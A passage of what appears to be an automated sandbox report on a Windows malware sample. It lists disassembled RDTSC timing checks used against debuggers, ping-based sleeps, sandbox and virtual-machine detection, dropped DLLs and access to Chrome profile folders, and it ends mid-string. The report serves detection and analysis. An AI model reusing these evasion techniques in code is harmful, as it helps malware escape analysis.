Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041F9 second address: 00000000004041FF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C54h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404223 second address: 0000000000404229 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404245 second address: 000000000040424B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040426A second address: 0000000000404270 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C50h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040428F second address: 0000000000404295 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404295 second address: 00000000004042B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004042B3 second address: 00000000004042B9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004042B9 second address: 00000000004042D8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004042D8 second address: 00000000004042DE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004042DE second address: 0000000000404300 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C53h 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404300 second address: 0000000000404306 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404306 second address: 0000000000404079 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684D71997h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404079 second address: 000000000040407F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040409B second address: 00000000004040A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C50h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004040C1 second address: 00000000004040C7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C51h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004040E8 second address: 00000000004040EE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040434E second address: 0000000000404354 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403BDA second address: 0000000000403BFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C02 second address: 0000000000403C23 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 00403F45h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C29 second address: 0000000000403C43 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C49 second address: 0000000000403C6C instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC881h 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C72 second address: 0000000000403C92 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 00404779h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C98 second address: 0000000000403CB7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 00403FA9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684CEC92Ah 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007FA684CECA8Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC879h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC887h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC880h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404295 second address: 00000000004042B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004042B9 second address: 00000000004042D8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004042DE second address: 0000000000404300 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404306 second address: 0000000000404079 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684CEC5C7h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC880h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC881h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Uses ping.exe to sleep
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00403E2C rdtsc 0_2_00403E2C
Contains functionality to read device registry values (via SetupAPI)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA, 0_2_10019780
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_100204C0 0_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_100204C0 2_2_100204C0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe TID: 6764 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe TID: 7152 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe TID: 7164 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe File opened: PhysicalDrive0
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001A170 FindFirstFileA,FindClose, 0_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1001A170 FindFirstFileA,FindClose, 2_2_1001A170
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: 56BB1610C0318054.exe, 00000002.00000003.277122800.0000000003154000.00000004.00000001.sdmp Binary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI
Source: 56BB1610C0318054.exe, 00000002.00000003.249619357.0000000002DE1000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.251729735.0000000002C41000.00000004.00000001.sdmp Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft 